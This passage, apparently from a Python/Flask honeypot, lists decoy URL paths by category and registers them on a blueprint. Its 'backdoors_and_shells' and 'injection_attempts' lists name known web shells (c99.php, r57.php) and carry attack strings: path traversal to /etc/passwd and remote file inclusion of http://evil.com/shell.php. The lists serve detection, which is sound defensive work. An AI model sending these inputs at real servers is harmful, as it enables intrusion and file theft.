            '/swarm', '/swarm/login', '/swarm/admin', '/swarm/dashboard',
            
            # Kubernetes
            '/kubernetes', '/kubernetes/login', '/k8s', '/k8s/login',
            '/kubernetes/admin', '/k8s/admin', '/kubernetes/dashboard', '/k8s/dashboard',
            '/kube', '/kube/login', '/kube/admin', '/kube/dashboard'
        ],
        
        "web_frameworks": [
            # Django
            '/django/admin', '/admin/django', '/django-admin', '/djangoadmin',
            '/django/login', '/django/dashboard', '/django/backend', '/django/staff',
            
            # Ruby on Rails
            '/rails/admin', '/admin/rails', '/rails-admin', '/railsadmin',
            '/rails/login', '/rails/dashboard', '/rails/backend', '/rails/console',
            
            # ASP.NET
            '/aspnet/admin', '/admin/aspnet', '/aspnet-admin', '/aspnetadmin',
            '/aspnet/login', '/aspnet/dashboard', '/aspnet/backend', '/aspnet/panel',
            
            # Flask
            '/flask/admin', '/admin/flask', '/flask-admin', '/flaskadmin',
            '/flask/login', '/flask/dashboard', '/flask/backend', '/flask/panel',
            
            # Express.js
            '/express/admin', '/admin/express', '/express-admin', '/expressadmin',
            '/express/login', '/express/dashboard', '/express/backend', '/express/panel',
            
            # Spring
            '/spring/admin', '/admin/spring', '/spring-admin', '/springadmin',
            '/spring/login', '/spring/dashboard', '/spring/backend', '/spring/panel'
        ],
        
        "logs_and_debug": [
            # Log files
            '/logs', '/log', '/logs.txt', '/log.txt',
            '/access.log', '/error.log', '/debug.log', '/system.log',
            '/logs/access', '/logs/error', '/logs/debug', '/logs/system',
            '/log/access', '/log/error', '/log/debug', '/log/system',
            
            # Debug endpoints
            '/debug', '/debug/console', '/debug/panel', '/debug/info',
            '/debug/log', '/debug/status', '/debug/vars', '/debug/pprof',
            '/debug/health', '/debug/metrics', '/debug/trace', '/debug/heap',
            
            # Trace and profiling
            '/trace', '/profile', '/profiler', '/tracing',
            '/trace/console', '/profile/console', '/profiler/console', '/tracing/console',
            '/trace/dumps', '/profile/dumps', '/profiler/dumps', '/tracing/dumps'
        ],
        
        "backdoors_and_shells": [
            # PHP shells
            '/shell.php', '/c99.php', '/r57.php', '/cmd.php',
            '/webshell.php', '/backdoor.php', '/terminal.php', '/exec.php',
            '/console.php', '/system.php', '/eval.php', '/rsh.php',
            
            # JSP shells
            '/shell.jsp', '/cmd.jsp', '/webshell.jsp', '/backdoor.jsp',
            '/terminal.jsp', '/exec.jsp', '/console.jsp', '/system.jsp',
            
            # ASP shells
            '/shell.asp', '/cmd.asp', '/webshell.asp', '/backdoor.asp',
            '/terminal.asp', '/exec.asp', '/console.asp', '/system.asp',
            
            # ASPX shells
            '/shell.aspx', '/cmd.aspx', '/webshell.aspx', '/backdoor.aspx',
            '/terminal.aspx', '/exec.aspx', '/console.aspx', '/system.aspx'
        ],
        
        "injection_attempts": [
            # SQL injection
            '/page.php?id=1', '/article.php?id=1', '/product.php?id=1', '/user.php?id=1',
            '/view.php?page=1', '/index.php?cat=1', '/show.php?item=1', '/display.php?id=1',
            
            # Path traversal / LFI
            '/index.php?page=../../../etc/passwd', '/view.php?file=../../../etc/passwd',
            '/include.php?file=../../../etc/passwd', '/display.php?template=../../../etc/passwd',
            '/main.php?page=../../../etc/passwd', '/index.php?show=../../../etc/passwd',
            '/index.php?load=../../../etc/passwd', '/index.php?include=../../../etc/passwd',
            
            # RFI
            '/index.php?page=http://evil.com/shell.php', '/view.php?file=http://evil.com/shell.php',
            '/include.php?file=http://evil.com/shell.php', '/display.php?template=http://evil.com/shell.php',
            '/main.php?page=http://evil.com/shell.php', '/index.php?show=http://evil.com/shell.php',
            '/index.php?load=http://evil.com/shell.php', '/index.php?include=http://evil.com/shell.php'
        ],
        
        "mobile_endpoints": [
            # Mobile API endpoints
            '/api/mobile', '/api/v1/mobile', '/api/v2/mobile', '/api/mobile/v1',
            '/mobile/api', '/mobile/v1/api', '/mobile/v2/api', '/api/app',
            '/app/api', '/api/ios', '/api/android', '/api/mobile/ios',
            '/api/mobile/android', '/api/app/ios', '/api/app/android', '/mobile/login',
            
            # Mobile app specific endpoints
            '/app/config', '/app/settings', '/app/version', '/app/update',
            '/mobile/config', '/mobile/settings', '/mobile/version', '/mobile/update',
            '/api/app/config', '/api/app/settings', '/api/app/version', '/api/app/update'
        ],
        
        "cloud_services": [
            # AWS
            '/aws/login', '/aws/console', '/aws/admin', '/amazon/login',
            '/s3/login', '/s3/admin', '/s3/console', '/s3/bucket',
            '/ec2/login', '/ec2/admin', '/ec2/console', '/ec2/instance',
            
            # Azure
            '/azure/login', '/azure/console', '/azure/admin', '/microsoft/login',
            '/azure/portal', '/azure/dashboard', '/azure/vm', '/azure/storage',
            
            # Google Cloud
            '/gcp/login', '/gcp/console', '/gcp/admin', '/google/login',
            '/gcloud/login', '/gcloud/console', '/gcloud/admin', '/gcp/dashboard',
            
            # Digital Ocean
            '/digitalocean/login', '/do/login', '/do/admin', '/digitalocean/admin',
            '/do/console', '/digitalocean/console', '/do/dashboard', '/digitalocean/dashboard'
        ],
        
        "monitoring_tools": [
            # Nagios
            '/nagios', '/nagios/login', '/nagios/admin', '/nagios3',
            '/nagios4', '/nagios/cgi-bin', '/nagios3/cgi-bin', '/nagios4/cgi-bin',
            
            # Zabbix
            '/zabbix', '/zabbix/login', '/zabbix/admin', '/zabbix.php',
            '/zabbix/index.php', '/zabbix/dashboard.php', '/zabbix/charts.php', '/zabbix/setup.php',
            
            # Grafana
            '/grafana', '/grafana/login', '/grafana/admin', '/monitoring',
            '/grafana/dashboard', '/grafana/explore', '/grafana/plugins', '/grafana/alerting',
            
            # Prometheus
            '/prometheus', '/prometheus/login', '/prometheus/admin', '/prom',
            '/prometheus/graph', '/prometheus/alerts', '/prometheus/targets', '/prometheus/status'
        ]
    }
    
    return honeypot_routes

def register_routes_with_blueprint(blueprint, handler_function):
    """Register all honeypot routes with the given blueprint using the handler function"""
    routes = get_honeypot_routes()
    
    # Register all routes with the blueprint
    for category, paths in routes.items():
        for path in paths:
            blueprint.add_url_rule(
                path, 
                endpoint=f"honeypot_{category}_{path.replace('/', '_').replace('.', '_')}",
                view_func=handler_function,
                methods=['GET', 'POST']
            )
